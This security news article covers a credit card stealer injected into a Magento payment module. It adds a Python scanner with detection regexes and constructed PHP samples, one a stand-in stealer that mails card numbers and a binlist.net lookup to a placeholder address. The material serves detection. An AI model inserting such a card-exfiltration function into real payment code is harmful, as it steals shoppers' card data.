Credit Card Scrapers Continue to Target Magento

Researchers said last week they came across a malicious function that was snuck into a module in Magento in order to steal credit card information.

Attackers continue to take aim at the e-commerce platform Magento. Researchers said last week they came across a malicious function snuck into one of the platform’s modules in order to steal credit card information.

Code for the function was injected into a .php file for SF9 Realex, a module that helps sites store customer credit card data for the one-click checkout functionality commonly used by repeat customers. The module interacts with the Realex RealAuth Remote and Redirect systems, “very popular solutions in the Magento community,” according to Bruno Zanelato, a researcher with the firm Sucuri, who found the malicious function.

The function, sendCCNumber(), reroutes the credit card information a customer enters in Magento to an attacker’s email address, which is hidden in a variable defined later in the code. The data, encoded as JSON, arrives in the attacker’s inbox without the victim being any the wiser.

According to researchers, the attacker uses binlist.net, a public web service for searching issuer identification numbers (IIN), to help identify which bank each card is associated with.
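As an added check, here is a small Python scanner written for this page (it is example code, not Sucuri’s tooling or the SF9 Realex module’s own code) that looks for the combination of behaviours described above in PHP source: card fields read, JSON-encoded, looked up at binlist.net and sent out through mail() or an outbound request. The field names cc_number, cc_cid and getCcNumber are assumed to be the Magento 1 payment fields; the three PHP samples are constructed stand-ins, not the real module or the real injected code. A hash-manifest diff is included because a baseline taken from a clean install is the quickest way to spot a modified module file.

```python
"""Indicator scan for PHP files under a Magento install, plus a hash-manifest
diff for catching modified module files. Field names, regexes and the sample
PHP below are this example's assumptions, not the real module or real stealer.
"""
import hashlib
import re
import sys
from pathlib import Path

# Behavioural indicators from the article: reads card fields, JSON-encodes them,
# looks the BIN up at binlist.net and sends the result out via mail() or HTTP.
INDICATORS = {
    "card_fields": re.compile(r"\b(cc_number|cc_cid|cc_exp_month|cc_exp_year)\b|getCcNumber", re.I),
    "json_encode": re.compile(r"\bjson_encode\s*\("),
    "mail_call": re.compile(r"\bmail\s*\("),
    "remote_request": re.compile(r"\bcurl_init\s*\(|\bfile_get_contents\s*\(\s*['\"]https?://", re.I),
    "binlist_lookup": re.compile(r"binlist\.net", re.I),
    "named_function": re.compile(r"\bfunction\s+sendCCNumber\s*\(", re.I),
}


def count_indicators(src: str) -> dict:
    """Count matches of each indicator in one file's source."""
    return {name: len(pat.findall(src)) for name, pat in INDICATORS.items()}


def classify(hits: dict) -> str:
    """Rate one file: 'high' for the stealer's own fingerprints or card data
    feeding mail(); 'review' for card data next to an outbound request or
    json_encode (a legitimate gateway module looks like this too); else 'clean'."""
    if hits["named_function"] or hits["binlist_lookup"] or (hits["card_fields"] and hits["mail_call"]):
        return "high"
    if hits["card_fields"] and (hits["remote_request"] or hits["json_encode"]):
        return "review"
    return "clean"


def scan_tree(root: Path) -> dict:
    """Classify every .php file under root (e.g. app/code/community)."""
    return {str(p.relative_to(root)): classify(count_indicators(p.read_text(errors="replace")))
            for p in root.rglob("*.php")}


def file_hashes(root: Path) -> dict:
    """SHA-256 of every .php file under root; keep the output from a clean
    install as the baseline and diff later runs against it."""
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*.php")}


def changed_files(baseline: dict, current: dict) -> list:
    """Files whose hash differs from the baseline or that the baseline lacks,
    which is where an injected function shows up first."""
    return sorted(f for f, h in current.items() if baseline.get(f) != h)


# Constructed sample sources (stand-ins, not the real SF9 Realex code).
SAMPLES = {
    "Model/Remote.php": """<?php
class SF9_Realex_Model_Remote {
    public function capture($payment) {
        $fields = http_build_query(array(
            'cc_number' => $payment->getCcNumber(),
            'cc_cid'    => $payment->getCcCid(),
        ));
        $ch = curl_init($this->getGatewayUrl());
        curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
        return curl_exec($ch);
    }
}
""",
    "Model/Remote.injected.php": """<?php
class SF9_Realex_Model_Remote {
    private $_t = 'dropbox@example.invalid';
    public function capture($payment) {
        $data = array('cc_number' => $payment->getCcNumber());
        $this->sendCCNumber($data);
        return $this->forward($data);
    }
    private function sendCCNumber($data) {
        $issuer = file_get_contents('https://binlist.net/' . substr($data['cc_number'], 0, 6));
        mail($this->_t, 'order', json_encode(array($data, $issuer)));
    }
}
""",
    "Helper/Data.php": """<?php
class SF9_Realex_Helper_Data {
    public function getGatewayUrl() { return 'https://gateway.example/'; }
}
""",
}


def scan_samples() -> dict:
    """Run the classifier over the constructed samples."""
    return {name: classify(count_indicators(src)) for name, src in SAMPLES.items()}


if __name__ == "__main__":
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    results = scan_tree(root) if root else scan_samples()
    for name, verdict in sorted(results.items()):
        print(f"{verdict:6} {name}")
```

Run with no arguments to see the verdicts on the samples, or pass a module directory to scan it. Note that the clean gateway model still lands in "review": a real payment module also reads card fields and talks to a remote host, so the signal worth acting on is that data reaching mail(), the BIN lookup, or a file whose hash no longer matches the baseline.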

Zanelato said Friday that attackers are going to greater lengths to target credit card data, especially on e-commerce platforms like Magento.

“Magento credit card stealers are indeed on the rise,” Zanelato wrote Friday. “While the information here is specific to Magento, realize that this can affect any platform that is used for ecommerce. As the industry grows, so will the specific attacks targeting it.”

Zanelato is quick to point out that no vulnerability in Magento itself enabled the theft of credit card data. Instead, he says, the attacker exploited a different, unnamed vulnerability in the website hosting the e-commerce platform. From there the attacker was able to inject the script and take over SF9 Realex.

It is, however, only the latest in a line of credit card stealers that Sucuri researchers have observed taking advantage of Magento.

Last summer Cesar Anjos, a researcher with the firm, looked at one stealer that was loaded from another source. The stealer essentially performed a man-in-the-middle attack between the user and the checkout page after credit card information was entered. Last October, Ben Martin, a different researcher with the firm, discovered attackers scraping credit card numbers and exfiltrating them in obscure, sometimes publicly viewable image files.

Researchers with RiskIQ monitored attacks similar to ones described by Sucuri last year. The firm said the attacks it had been monitoring originated from a single hacking group targeting e-commerce platforms such as Powerfront CMS and OpenCart with a web-based keylogger in March 2016.
